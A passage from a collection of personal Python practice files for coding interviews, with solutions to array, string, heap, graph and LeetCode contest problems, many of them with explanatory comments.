# return dic # {'hello_world': 1}
# if __name__ == '__main__':
# print(Solution(words))
# string = "1921680"
# def Solution(string):
# # newList = []
# # for i in range(1, len(string)):
# # print(string[:i])
# return ([string[:i] for i in range(1,len(string))])
# # print([string[:i] for i in range(1,len(string))])
# # for j in range(len(array)):
# if __name__ == '__main__':
# # Solution(string)
# print(Solution(string))
```
#### File: code_master_platform/6.w3/dict.py
```python
# def main():
# givenDict = Dictionary({0: 10, 1: 20})
# givenDict.addKey()
# if __name__ == '__main__':
# main()
################################
# 3. Write a Python script to concatenate following dictionaries to create a new one. Go to the editor
# Sample Dictionary :
# dic1={1:10, 2:20}
# dic2={3:30, 4:40}
# dic3={5:50,6:60}
# Expected Result : {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
################################
# class Dictionary(object):
# def __init__(self, dic1: dict, dic2: dict, dic3: dict) -> None:
# self.dic1 = dic1
# self.dic2 = dic2
# self.dic3 = dic3
# def concatenate(self):
# # print(self.dic1)
# # print(self.dic2)
# # print(self.dic3)
# # method 1
# # self.dic1.update(self.dic2)
# # self.dic1.update(self.dic3)
# # return self.dic1
# # method 2
# return {**self.dic1, **self.dic2, **self.dic3}
# def main():
# givenDict = Dictionary({1:10, 2:20}, {3:30, 4:40}, {5:50,6:60})
# print(givenDict.concatenate())
# if __name__ == '__main__':
# main()
################################
# 4. Write a Python script to check whether a given key already exists in a dictionary
################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def check_key(self, key:int) -> bool:
# return key in self.dictionary
# def main():
# givenDict = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
# givenSolution = Solution(givenDict)
# print(givenSolution.check_key(5))
# if __name__ == '__main__':
# main()
################################
# 5. Write a Python program to iterate over dictionaries using for loops.
################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def iterate_dictionary(self):
# for key, value in self.dictionary.items():
# print(f'{key} : {value}')
# import unittest
# class Test(unittest.TestCase):
# def test_iterate_dictionary(self):
# givenDict = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
# givenSolution = Solution(givenDict)
# givenSolution.iterate_dictionary()
# def main():
# unittest.main()
# if __name__ == '__main__':
# main()
################################
# 6. Write a Python script to generate and print a dictionary that contains a number (between 1 and n) in the form (x, x*x). Go to the editor
# Sample Dictionary ( n = 5) :
# Expected Output : {1: 1, 2: 4, 3: 9, 4: 16, 5: 25}
################################
# class Solution:
# def __init__(self, n:int) -> None:
# self.n = n
# # method 1
# # def generate_dictionary(self):
# # for key, value in self.dictionary.items():
# # finalValue = key * key
# # print(f'{key} : {finalValue}')
# def generate_dictionary(self):
# return {x: x*x for x in range(1, self.n+1)}
# def print_dictionary(self):
# print(self.generate_dictionary())
# import unittest
# class Test(unittest.TestCase):
# def test_generate_dictionary(self):
# givenN = 5
# givenSolution = Solution(givenN)
# givenSolution.print_dictionary()
# def main():
# unittest.main()
# if __name__ == '__main__':
# main()
#################################
# 7. Write a Python script to print a dictionary where the keys are numbers between 1 and 15 (both included) and the values are square of keys.
#################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def print_dictionary(self):
# # method 1
# # for i in range(1, 16):
# # print(f'{i}' ':' f'{i*i}')
# # method 2
# # print({x: x*x for x in range(1, 16)})
# # method 3
# # print(f'{dict(zip(range(1, 16), [x*x for x in range(1, 16)]))}')
# # method 4
# # dictionary = {x: x*x for x in range(1, 16)}
# # print(dictionary)
# # method 5
# # d = dict()
# # for i in range(1, 16):
# # d[i] = i*i
# # print(d)
# def main():
# Solution({}).print_dictionary()
# if __name__ == '__main__':
# main()
#################################
# 8.
#################################
``` |
{
"source": "jimmymalhan/Coding_Interview_Questions_Python_algoexpert",
"score": 4
} |
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.1_ans.py
```python
RED, WHITE, BLUE = range(3)
def dutch_flag_partition1(pivot_index, A):
pivot = A[pivot_index] # fetch the value at pivot_index in A and save it to "pivot" variable
# First pass: group elements smaller than pivot
for i in range(len(A)):
# Look for smaller element.
for j in range(i + 1, len(A)):
if A[j] < pivot:
A[i], A[j] = A[j], A[i]
break
# Second pass: group elements larger than pivot.
for i in reversed(range(len(A))):
# Look for a larger element. Stop when we reach an element less
# than pivot, since first pass has moved them to start of A.
for j in reversed(range(i)):
if A[j] > pivot:
A[i], A[j] = A[j], A[i]
break
# Time complexity is O(n^2)
# Space complexity is O(1)
##########################################################################
# Improve time complexity
RED, WHITE, BLUE = range(3)
def dutch_flag_partition2(pivot_index, A):
pivot = A[pivot_index]
# First pass: group elements smaller than pivot.
smaller = 0
for i in range(len(A)):
if A[i] < pivot:
A[i], A[smaller] = A[smaller], A[i]
smaller += 1
# Second pass: group elements larger than pivot.
larger = len(A) - 1
for i in reversed(range(len(A))):
if A[i] < pivot:
break
elif A[i] > pivot:
A[i], A[larger] = A[larger], A[i]
larger -= 1
# Time complexity = O(n)
# Space complexity = O(1)
##########################################################################
# performs classification into elements less than, equal to,
# and greater than the pivot in a SINGLE PASS
# initially all elements are unclassified
RED, WHITE, BLUE = range(3)
def dutch_flag_partition3(pivot_index, A):
pivot = A[pivot_index]
    # Keep the following invariants during partitioning:
# bottom group: A[smaller]
# middle group: A[smaller:equal]
# unclassified group: A[equal:larger]
# top group: A[larger:]
smaller, equal, larger = 0, 0, len(A)
    # Keep iterating as long as there is an unclassified element.
while equal < larger:
        # A[equal] is the incoming unclassified element
if A[equal] < pivot:
A[smaller], A[equal] = A[equal], A[smaller]
smaller, equal = smaller + 1, equal + 1
elif A[equal] == pivot:
equal += 1
else: # A[equal] > pivot
larger -= 1
A[equal], A[larger] = A[larger], A[equal]
    # each iteration decreases the size of the unclassified group by 1
# Time complexity = O(n)
# Space complexity = O(1)
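# Illustrative usage sketch (not part of the original file); the sample array and
# pivot index are assumed for demonstration only.
if __name__ == '__main__':
    for partition in (dutch_flag_partition1, dutch_flag_partition2, dutch_flag_partition3):
        A = [0, 1, 2, 0, 2, 1, 1]
        partition(2, A)  # pivot value is A[2] == 2
        print(A)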
```
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.3_ans.py
```python
def multiply(num1, num2):
sign = -1 if (num1[0] < 0) ^ (num2[0] < 0) else 1
num1[0], num2[0] = abs(num1[0]), abs (num2[0])
result = [0] * (len(num1)+ len(num2))
for i in reversed(range(len(num1))):
for j in reversed(range(len(num2))):
result[i + j + 1] += num1[i] * num2[j]
result[i + j] += result[i + j + 1] // 10
result[i + j + 1] %= 10
# remove the leading zeroes.
result = result[next((i for i, x in enumerate(result)
if x != 0), len(result)):] or [0]
    return [sign * result[0]] + result[1:]
# There are m partial product, each with at most n + 1 digits. We perform O(1) operations on each digit in each
# partial product, so the
# time complexity = O(nm)
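# Illustrative usage sketch; the operands are assumed for demonstration only.
if __name__ == '__main__':
    print(multiply([1, 2, 3], [4, 5, 6]))  # 123 * 456 = 56088 -> [5, 6, 0, 8, 8]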
```
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.6_ans.py
```python
def buy_and_sell_stock_once(prices):
min_price_so_far, max_profit = float('inf'), 0.0
for price in prices:
max_profit = max(max_profit, price - min_price_so_far)
min_price_so_far = min(min_price_so_far, price)
return max_profit
# time complexity - O(n)
# space complexity - O(1)
# max method takes two or more argument or at iterable,
# For 2 arguments i.e max_profit and max_profit_sell_today,
# it returns the variable which would have maximum value
# LC = 0121.best_time_to_buy_and_sell_stock.py
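# Illustrative usage sketch; the price series is assumed for demonstration only.
if __name__ == '__main__':
    print(buy_and_sell_stock_once([310, 315, 275, 295, 260, 270, 290, 230, 255, 250]))  # 30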
```
#### File: 2.leet_code/Array/0121.best_time_to_buy_and_sell_stock.py
```python
price = [2,3,5,5,7,11,11,11,13]
def maxProfit(prices):
max_profit, min_price = 0, float('inf')
for price in prices:
min_price = min(min_price, price)
profit = price - min_price
max_profit = max(max_profit, profit)
return max_profit
print(maxProfit(price))
```
#### File: 2.leet_code/contest/2186. Minimum Number of Steps to Make Two Strings Anagram II.py
```python
import collections
class Solution:
def minSteps(self, s: str, t: str) -> int:
hashmap = {}
for char in s:
hashmap[char] = hashmap.get(char, 0) + 1 # get(char, 0) is the default value of hashmap[char]
for char in t:
hashmap[char] = hashmap.get(char, 0) - 1 # get(char, 0) is the default value of hashmap[char]
return sum(abs(v) for v in hashmap.values()) # sum(abs(v) for v in hashmap.values()) is the sum of all values in hashmap
print(Solution().minSteps("leetcode", "coats"))
```
#### File: 2.leet_code/contest/2187. Minimum Time to Complete Trips.py
```python
from typing import List
class Solution:
    def minimumTime(self, time: List[int], totalTrips: int) -> int:
        # Binary search on the elapsed time: find the smallest t such that
        # all buses together complete at least totalTrips trips within t.
        lo, hi = 1, min(time) * totalTrips
        while lo < hi:
            mid = (lo + hi) // 2
            if sum(mid // t for t in time) >= totalTrips:
                hi = mid
            else:
                lo = mid + 1
        return lo
print(Solution().minimumTime([1,2,3], 5))
```
#### File: 2.leet_code/contest/Check if Numbers Are Ascending in a Sentence.py
```python
class Solution:
    def __init__(self, s: str) -> None:
self.s = s
def areNumbersAscending1(self):
letter = [int(i) for i in self.s.split() if i.isdigit()]
for i in range(len(letter)):
for j in range(i + 1, len(letter)):
if letter[i] >= letter[j]:
return False
return True
def areNumbersAscending2(self):
s = self.s.split(' ')
last = float('-inf')
for char in s:
if char.isnumeric():
if int(char) <= last:
return False
else:
last = int(char)
return True
def main():
givenArray1 = Solution("sunset is at 7 51 pm overnight lows will be in the low 50 and 60 s")
print(givenArray1.areNumbersAscending1())
givenArray2 = Solution("hello world 5 x 5")
print(givenArray2.areNumbersAscending1())
givenArray3 = Solution("36 claim 37 38 39 39 41 hire final 42 43 twist shift young 44 miss 45 46 sad 47 48 dig 49 50 green 51 train 52 broad 53")
print(givenArray3.areNumbersAscending1())
givenArray4 = Solution("sunset is at 7 51 pm overnight lows will be in the low 50 and 60 s")
print(givenArray4.areNumbersAscending2())
givenArray5 = Solution("hello world 5 x 5")
print(givenArray5.areNumbersAscending2())
givenArray5 = Solution("36 claim 37 38 39 39 41 hire final 42 43 twist shift young 44 miss 45 46 sad 47 48 dig 49 50 green 51 train 52 broad 53")
print(givenArray5.areNumbersAscending2())
if __name__ == '__main__':
main()
```
#### File: 2.leet_code/contest/Find Target Indices After Sorting Array.py
```python
from typing import List
class Solution:
def targetIndices(self, nums: List[int], target: int) -> List[int]:
sorted_nums = sorted(nums)
count = 0
result = []
for i in range(len(nums)): # loop through nums
if sorted_nums[i] == target:
result.append(count)
count += 1
return result
def main():
nums = [1,2,5,2,3]
target = 2
print(Solution().targetIndices(nums, target))
main()
```
#### File: 2.leet_code/contest/Minimum number of flips with rotation to make binary string alternating.py
```python
def MinimumFlips(s: str) -> int:
n = len(s)
a = [0] * n
for i in range(n):
a[i] = 1 if s[i] == '1' else 0
# Initialize prefix arrays to store
# number of changes required to put
# 1s at either even or odd position
oddone = [0] * (n + 1)
evenone = [0] * (n + 1)
for i in range(n):
# If i is odd
if(i % 2 != 0):
# Update the oddone
# and evenone count
if(a[i] == 1):
oddone[i + 1] = oddone[i] + 1
else:
oddone[i + 1] = oddone[i] + 0
if(a[i] == 0):
evenone[i + 1] = evenone[i] + 1
else:
evenone[i + 1] = evenone[i] + 0
# Else i is even
else:
# Update the oddone
# and evenone count
if (a[i] == 0):
oddone[i + 1] = oddone[i] + 1
else:
oddone[i + 1] = oddone[i] + 0
if (a[i] == 1):
evenone[i + 1] = evenone[i] + 1
else:
evenone[i + 1] = evenone[i] + 0
# Initialize minimum flips
minimum = min(oddone[n], evenone[n])
# Check if substring[0, i] is
# appended at end how many
# changes will be required
for i in range(n):
if(n % 2 != 0):
minimum = min(minimum, oddone[n] - oddone[i + 1] + evenone[i + 1])
minimum = min(minimum, evenone[n] - evenone[i + 1] + oddone[i + 1])
# Return minimum flips
return minimum
# Driver Code
# Given String
s = "000001100"
# Function call
print(MinimumFlips(s))
```
#### File: 2.leet_code/contest/Smallest Index With Equal Value.py
```python
class Solution:
def smallestEqual(self, nums):
for i in range(len(nums)):
if i % 10 == nums[i]:
return i
return -1
def smallestEqual2(self, nums):
for i, num in enumerate(nums):
            if i % 10 == num:
return i
return -1
def main():
nums = [4,3,2,1]
print(Solution().smallestEqual2(nums))
import unittest
class Test(unittest.TestCase):
def test1(self):
s = Solution()
self.assertEqual(s.smallestEqual([4,3,2,1]), 2)
print("Tests Passed!")
def test2(self):
s = Solution()
self.assertEqual(s.smallestEqual([4,3,2,1]), 2)
print("Tests Passed!")
if __name__ == "__main__":
unittest.main()
main()
```
#### File: 2.leet_code/contest/Two Furthest Houses With Different Colors.py
```python
from typing import List
class Solution:
def maxDistance(self, colors: List[int]) -> int:
ans = 0 # ans is the max distance between two houses with different colors
for i, x in enumerate(colors): # i is the index of the house, x is the color of the house
if x != colors[0]: ans = max(ans, i) # if the color of the house is not the same as the first house, then update the max distance
if x != colors[-1]: ans = max(ans, len(colors)-1-i) # if the color of the house is not the same as the last house, then update the max distance
return ans
def main():
colors = [1,1,1,6,1,1,1]
print(Solution().maxDistance(colors))
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Arrays/5.tournament_winner.py
```python
# loop through the competitions
# seperate home and away team
# define winning team -
# if the competition's element is winner based on the results
# update scores by 3 points
# find the best team in the scores
# optimization - create a new variable to track the winner element
# compare the current element's score with the winner element (in new variable) until finished
# O(n) time | O(k) space
# n - number of competitions or length of results (iteration)
# k - number of teams in the competitions (to store in DS - hash map)
Home_Team_Won = 1 # constant variable to make the code more readable
def tournamentWinner(competitions, results):
currentBestTeam = ""
scores = {currentBestTeam: 0} # defined hashMap DS
for idx, competition in enumerate(competitions):
result = results[idx]
#print(results)
# [0, 0, 1]
# [0, 0, 1]
# [0, 0, 1]
# print(results[idx])
# 0
# 0
# 1
homeTeam, awayTeam = competition # splitting the array for homeTeam and awayTeam
# defining the winningTeam by checking the result is equal to Home_Team_Won
winningTeam = homeTeam if result == Home_Team_Won else awayTeam
# updating the winningTeam's scores in the DS
updateScores(winningTeam, 3, scores)
# update the current best team
if scores[winningTeam] > scores[currentBestTeam]:
currentBestTeam = winningTeam
return currentBestTeam
def updateScores(team, points, scores):
if team not in scores: # if the scores are not defined for the team
scores[team] = 0 # assigning that team's value to be zero
scores[team] += points # else - updating the team's points (by 3 as defined)
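# Illustrative usage sketch; the competitions and results are assumed from the
# well-known sample input for this problem.
if __name__ == '__main__':
    competitions = [["HTML", "C#"], ["C#", "Python"], ["Python", "HTML"]]
    results = [0, 0, 1]
    print(tournamentWinner(competitions, results))  # Python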
```
#### File: 3.algorithmic_expert/Arrays/6.squared_number.py
```python
# sortedSquares.sort()
# return sortedSquares
# def sortedSquaredArray(array):
# squaredList = []
# for item in array:
# squaredList.append(item * item)
# squaredList.sort()
# return squaredList
def sortedSquaredArray(array):
return (sorted(i ** 2 for i in array))
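# Illustrative usage sketch; the input array is assumed for demonstration only.
print(sortedSquaredArray([-7, -3, 1, 2, 4]))  # [1, 4, 9, 16, 49]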
```
#### File: 3.algorithmic_expert/Arrays/8.smallest_difference.py
```python
def smallestDifference(arrayOne, arrayTwo):
arrayOne.sort(), arrayTwo.sort()
idxOne, idxTwo = 0, 0
smallest, current = float("inf"), float("inf") # keep track of the smallest difference and the current difference
smallestPair = []
    while idxOne < len(arrayOne) and idxTwo < len(arrayTwo): # while both pointers are still in range of their arrays, starting at the beginning of each array
firstNum, secondNum = arrayOne[idxOne], arrayTwo[idxTwo]
if firstNum < secondNum:
current = secondNum - firstNum # update current to the difference between the two numbers
idxOne += 1
elif secondNum < firstNum:
current = firstNum - secondNum
idxTwo += 1
else:
return [firstNum, secondNum] # if the numbers are equal, return the pair
if smallest > current:
smallest = current # update smallest to current
smallestPair = [firstNum, secondNum]
return smallestPair
print(smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]))
```
#### File: Graphs/Matrix/4.River Sizes.py
```python
def riverSizes(matrix):
sizes = [] # holds the sizes of the rivers
visited = [[False for value in row] for row in matrix] # initializing visited as "2D matrix to False" - False for value in row and for row in matrix
    # iterate through the matrix node by node; any unvisited node is traversed with a depth-first search to measure the river it belongs to
for i in range(len(matrix)): # iterate through the rows
for j in range(len(matrix[i])): # iterate through the rows for i
if visited[i][j]: # if the node has been visited, continue or if visited[i][j] == True
continue
traverseNode(i, j, matrix, visited, sizes) # if the node has not been visited, traverse the node
return sizes
def traverseNode(i, j, matrix, visited, sizes): # i is the row index, j is the column index
currentRiverSize = 0 # holds the size of the river
# depth first search # stack
nodesToExplore = [[i, j]] # holds the nodes to explore # stack
while len(nodesToExplore): # while there are nodes to explore
        currentNode = nodesToExplore.pop() # pop the most recently added node (stack -> depth-first search)
        i = currentNode[0] # get the row
        j = currentNode[1] # get the column
if visited[i][j]: # if the node has been visited, continue
continue
visited[i][j] = True # mark the node as visited
if matrix[i][j] == 0:
continue
currentRiverSize += 1 # increment the river size # if the node is 1, add it to the queue
unvisitedNeighbors = getUnvisitedNeighbors(i, j, matrix, visited)
for neighbor in unvisitedNeighbors:
nodesToExplore.append(neighbor) # add the neighbor to the queue
if currentRiverSize > 0: # if the river size is greater than 0
sizes.append(currentRiverSize) # add the river size to the sizes array
def getUnvisitedNeighbors(i, j, matrix, visited):
unvisitedNeighbors = []
numRows = len(matrix)
numCols = len(matrix[i])
if i - 1 >= 0: # UP # check if the row is not on the border
unvisitedNeighbors.append((i - 1, j)) # push the neighbor into the neighbors list
if i + 1 < numRows: # DOWN # check if the row is not on the border
unvisitedNeighbors.append((i + 1, j))
if j - 1 >= 0: # LEFT # check if the col is not on the border
unvisitedNeighbors.append((i, j - 1)) #
if j + 1 < numCols: # RIGHT # check if the col is not on the border
unvisitedNeighbors.append((i, j + 1))
return unvisitedNeighbors
def main():
matrix = [
[1, 0, 0, 1, 0],
[1, 0, 1, 0, 0],
[0, 0, 1, 0, 1],
[1, 0, 1, 0, 1],
[1, 0, 1, 1, 0],
]
print(riverSizes(matrix)) # [1, 2, 2, 2, 5]
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Greedy Algorithm/3.tandem_bicycle.py
```python
"""
Explain the solution:
- The brute-force approach to solve this problem is to generate every possible set of pairs of riders and to determine the total speed that each of these sets generates. This solution does not work but, it isn't optimal. Can you think of better way to solve this problem?
- Try looking at the input arrays in sorted order. How might this help you solve the problem?
- When generating the maximum total speed, you want to pair the slowest red-shirt riders with the fastest blue-shirt riders and vice versa, so as to always take advantage of the largest speeds. When generating the minimum total speed, you want to pair the fastest red-shirt riders with the fastest blue-shirt riders, so as to "eliminate" a large speed by pairing it with a another large(larger) speed.
- Sort the input arrays in place, and follow the strategy discussed in Hint #3. With the inputs sorted, you can find the slowest and largest speeds from each shirt color in constant time.
- O(n(log(n)) time | O(1) space - where n is the length of the tandem bicycles
##################
Detailed explanation of the Solution:
create a function of tandemBicycle(redShirtSpeeds, blueShirtSpeeds, fastest):
sort the redShirtSpeeds and blueShirtSpeeds arrays in place
if not fastest:
call the function reverseArrayInPlace(redShirtSpeeds)
totalSpeed is initialized to 0
for idx in range(len(redShirtSpeeds)):
rider1 = redShirtSpeeds[idx] # array in sorted ascending order
rider2 = blueShirtSpeeds[len(blueShirtSpeeds) - 1 - idx] # Reverse the blueShirtSpeeds array in descending order
totalSpeed += max(rider1, rider2)
return totalSpeed
create a function of reverseArrayInPlace(array):
start = 0
end = len(array) - 1
while start < end:
array[start], array[end] = array[end], array[start]
start += 1
end -= 1
"""
####################################
def tandemBicycle(redShirtSpeeds, blueShirtSpeeds, fastest):
redShirtSpeeds.sort()
blueShirtSpeeds.sort()
if not fastest:
reverseArrayInPlace(redShirtSpeeds)
totalSpeed = 0
for idx in range(len(redShirtSpeeds)):
rider1 = redShirtSpeeds[idx] # array in sorted ascending order
rider2 = blueShirtSpeeds[len(blueShirtSpeeds) - 1 - idx] # Reverse the blueShirtSpeeds array in descending order
totalSpeed += max(rider1, rider2)
return totalSpeed
def reverseArrayInPlace(array):
start = 0
end = len(array) - 1
while start < end:
array[start], array[end] = array[end], array[start]
start += 1
end -= 1
print(tandemBicycle([5, 5, 3, 9, 2], [3, 6, 7, 2, 1], True))
```
#### File: 3.algorithmic_expert/Heaps/1.min_heap_construction.py
```python
class MinHeap:
def __init__(self, array):
self.heap = self.buildHeap(array)
# O(n) time | O(1) space
def buildHeap(self, array):
firstParentIdx = (len(array) - 2) // 2
for currentIdx in reversed(range(firstParentIdx + 1)):
self.siftDown(currentIdx, len(array) - 1, array)
return array
    # O(log(n)) time | O(1) space
def siftDown(self, currentIdx, endIdx, heap): # compare both childs
childOneIdx = currentIdx * 2 + 1 # formula
while childOneIdx <= endIdx: # if node doesn't have leaf or doesn't have anymore child
childTwoIdx = currentIdx * 2 + 2 if currentIdx * 2 + 2 <= endIdx else -1 # -1 is coz if childIdx doesn't have leaf
if childTwoIdx != -1 and heap[childTwoIdx] < heap[childOneIdx]:
idxToSwap = childTwoIdx
else:
idxToSwap = childOneIdx # if childOneIdx < childTwoIdx
if heap[idxToSwap] < heap[currentIdx]:
self.swap(currentIdx, idxToSwap, heap)
currentIdx = idxToSwap # siftDown
childOneIdx = currentIdx * 2 + 1 # recalculate
else:
return
def siftUp(self, currentIdx, heap):
parentIdx = (currentIdx - 1) // 2 #formula to check
while currentIdx > 0 and heap[currentIdx] < heap[parentIdx]:
self.swap(currentIdx, parentIdx, heap)
currentIdx = parentIdx
parentIdx = (currentIdx - 1) // 2
def peek(self):
return self.heap[0] # peeking root node
def remove(self):
self.swap(0, len(self.heap) - 1, self.heap)#swapping the two value
valueToRemove = self.heap.pop()
self.siftDown(0, len(self.heap) - 1, self.heap)
return valueToRemove # returning minimum value
def insert(self, value):
self.heap.append(value) # add the value
self.siftUp(len(self.heap) - 1, self.heap) # siftup = two values - current index & heap
def swap(self, i, j, heap):
heap[i], heap[j] = heap[j], heap[i]
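# Illustrative usage sketch (not part of the original file); the heap values are assumed.
if __name__ == '__main__':
    heap = MinHeap([48, 12, 24, 7, 8, -5, 24, 391, 24, 56, 2, 6, 8, 41])
    heap.insert(76)
    print(heap.peek())    # -5
    print(heap.remove())  # -5
    print(heap.peek())    # 2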
```
#### File: 3.algorithmic_expert/Strings/001.a.palindrome_check.py
```python
class MyClass:
def __init__(self, string:str):
self.string = string
# O(n^2) time | O(n) space
def isPalindrome_bruteforce(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
reversedString = []
for i in reversed(range(len(self.string))):
reversedString.append(self.string[i]) # adding directly to newString -> imporving
return self.string == "".join(reversedString)
# O(n) time and O(n) space
def isPalindrome_quickSol(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
return self.string == self.string[::-1]
# recursion
# O(n) time | O(n) space
def isPalindrome_recursion(self, i = 0):
j = len(self.string) - 1 - i
return True if i >= j else self.string[i] == self.string[j] and self.isPalindrome_recursion(i + 1)
# string[i] = firstIdx
    # string[j] = lastIdx
# recursion always involve extra memory because of tail recursion
# tail recursion -
# O(n) time and O(1) space
def isPalindromeOptimized(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
leftIdx = 0 # pointer on firstIdx
rightIdx = len(self.string) - 1 # # pointer on lastIdx
while leftIdx < rightIdx:
if self.string[leftIdx] != self.string[rightIdx]:
return False
leftIdx += 1
rightIdx -= 1
return True
def main():
stringName = MyClass("abcdcbA ##$@$ ^##^$")
print(stringName.isPalindrome_bruteforce())
print(stringName.isPalindrome_quickSol())
print(stringName.isPalindrome_recursion())
print(stringName.isPalindromeOptimized())
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Strings/003.a.run_length_encoding.py
```python
def runLengthEncoding(string):
encodedStringCharacters = [] # lossless data compression
currentRunLength = 1 # this will always be 1(never be zero)
for i in range(1, len(string)):
currentCharacter = string[i]
previousCharacter = string[i - 1]
if currentCharacter != previousCharacter or currentRunLength == 9: # or is req so it can append individually
encodedStringCharacters.append(str(currentRunLength))
encodedStringCharacters.append(previousCharacter)
            currentRunLength = 0 # reset so long runs are split, e.g. encoded as 9A4A rather than an invalid 13A
currentRunLength += 1
encodedStringCharacters.append(str(currentRunLength))
encodedStringCharacters.append(string[len(string) - 1])
return "".join(encodedStringCharacters)
def main():
print(runLengthEncoding("AAAABBBCCDAA")) # 4A3B2C1D2A
if __name__ == "__main__":
main()
```
#### File: 3.algorithmic_expert/Strings/005.longest_palindrome_substring.py
```python
string = "abaxyzzyxf"
# O(n^2) time | O(n) space
def longestPalindromicSubstring(string):
currentLongest = [0, 1]
for i in range(1, len(string)): # starting from 1, as index[0] is already a palindrome
odd = getLongestPalindromeFrom(string, i - 1, i + 1) # i-1 = leftIdx & i + 1 = rightIdx
even = getLongestPalindromeFrom(string, i - 1, i)
longest = max(odd, even, key=lambda x: x[1] - x[0])
currentLongest = max(longest, currentLongest, key=lambda x: x[1] - x[0])
return string[currentLongest[0] : currentLongest[1]]
def getLongestPalindromeFrom(string, leftIdx, rightIdx):
while leftIdx >= 0 and rightIdx < len(string):
if string[leftIdx] != string[rightIdx]:
break
leftIdx -= 1
rightIdx += 1
return [leftIdx + 1, rightIdx]
print(longestPalindromicSubstring(string))
# ====================================================================================================
# O(n^3) time | O(n) space
def longestPalindromicSubstring(string):
longest = ""
for i in range(len(string)): # from index 0
for j in range(i, len(string)): # idx[0-6], [1-6], [2-6], [3-6], [4-6], [5,6],[6]
substring = string[i : j + 1] # string at index[0, 0-1..., 0-9, 1, 1-2 ...]
if len(substring) > len(longest) and isPalindrome(substring): # len(substring)= 1-10, 1-9 ... > len(longest) and becomes palindrome
longest = substring
return longest
def isPalindrome(string):
leftIdx = 0
rightIdx = len(string) - 1
while leftIdx < rightIdx:
if string[leftIdx] != string[rightIdx]:
return False
leftIdx += 1
rightIdx -= 1
return True
```
#### File: 3.algorithmic_expert/Strings/007.group_anagrams.py
```python
words =["yo", "act", "flop", "tac", "foo", "cat", "oy", "olfp"]
def groupAnagrams(words):
if len(words) == 0:
return []
sortedWords = ["".join(sorted(w)) for w in words] # sorted in a list | oy, act, flop, act, foo, act, oy, flop
indices = [i for i in range(len(words))] # list of indices
indices.sort(key=lambda x: sortedWords[x]) # sorting the indices based on sortedWords (which was done alphabetically)
result = []
currentAnagramGroup = []
currentAnagram = sortedWords[indices[0]] # current running Anagram .. starting from index 0
for index in indices: # index - 1, 3, 5, 2, 7, 4, 0, 6
word = words[index] # word is sorted but not arranged | act, tac, cat, flop, olfp...
sortedWord = sortedWords[index] # word is sorted and arranged alphbetically | act, act, act, flop, flop, foo, oy, oy
if sortedWord == currentAnagram:
currentAnagramGroup.append(word)
continue
result.append(currentAnagramGroup) # act, tac, cat
currentAnagramGroup = [word] # flop, olfp
currentAnagram = sortedWord # oy, yo
result.append(currentAnagramGroup)
return result
# ===
# O(w * n * log(n) time) | O (wn) space - where w is the number of words and
# n is the length of the longest word
# words = ["yo", "act", "flop", "tac", "foo", "cat", "oy", "olfp"]
def groupAnagrams(words):
anagrams = {}
for word in words: # print(word) # yo, act, flop, tac, foo, cat, oy, olfp
sortedWord = "".join(sorted(word)) # sort indices # oy, act, flop, act, foo, act, oy, flop
if sortedWord in anagrams:
# print(sortedWord) # act, act, oy, flop # keys
# print(anagrams)
# {'oy': ['yo'], 'act': ['act'], 'flop': ['flop']}
# {'oy': ['yo'], 'act': ['act', 'tac'], 'flop': ['flop'], 'foo': ['foo']}
# {'oy': ['yo'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop'], 'foo': ['foo']}
# {'oy': ['yo', 'oy'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop'], 'foo': ['foo']}
# print(anagrams[sortedWord]) # ['act'], ['act', 'tac'], ['yo'], ['flop']
# value = key
anagrams[sortedWord].append(word) # if sorted word in anagram -> appending keys(word)
else:
anagrams[sortedWord] = [word] # if word is not found in anagram then adding word
# print(anagrams) #{'oy': ['yo', 'oy'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop', 'olfp'], 'foo': ['foo']}
# print(list(anagrams.keys())) # ['oy', 'act', 'flop', 'foo']
# print(list(anagrams.values())) # [['yo', 'oy'], ['act', 'tac', 'cat'], ['flop', 'olfp'], ['foo']]
return list(anagrams.values())
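# Illustrative usage sketch; reuses the sample words list defined at the top of this file.
if __name__ == '__main__':
    print(groupAnagrams(words))  # [['yo', 'oy'], ['act', 'tac', 'cat'], ['flop', 'olfp'], ['foo']]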
```
#### File: 3.algorithmic_expert/Strings/008.valid_ip_addresses.py
```python
def validIPAddresses(string):
ipAddressesFound = []
for i in range(1, min(len(string), 4)): # from index 0 - 4
currentIPAddressParts = ["","","",""]
currentIPAddressParts[0] = string[:i] # before the first period
if not isValidPart(currentIPAddressParts[0]):
continue
for j in range(i + 1, i + min(len(string) - i, 4)): # i + 1 = for second period, placement of i at most in 3 positions past of i
currentIPAddressParts[1] = string[i : j] # start from index i where the first position started to j at placement
if not isValidPart(currentIPAddressParts[1]):
continue
for k in range(j + 1, j + min(len(string) - j, 4)): # j + 1 = for third period, placement of j at most in 3 positions past of j
currentIPAddressParts[2] = string[j:k] # 3rd section
currentIPAddressParts[3] = string[k:] # 4th section
if isValidPart(currentIPAddressParts[2]) and isValidPart(currentIPAddressParts[3]):
ipAddressesFound.append(".".join(currentIPAddressParts))
return ipAddressesFound
def isValidPart(string):
stringAsInt = int(string)
if stringAsInt > 255:
return False
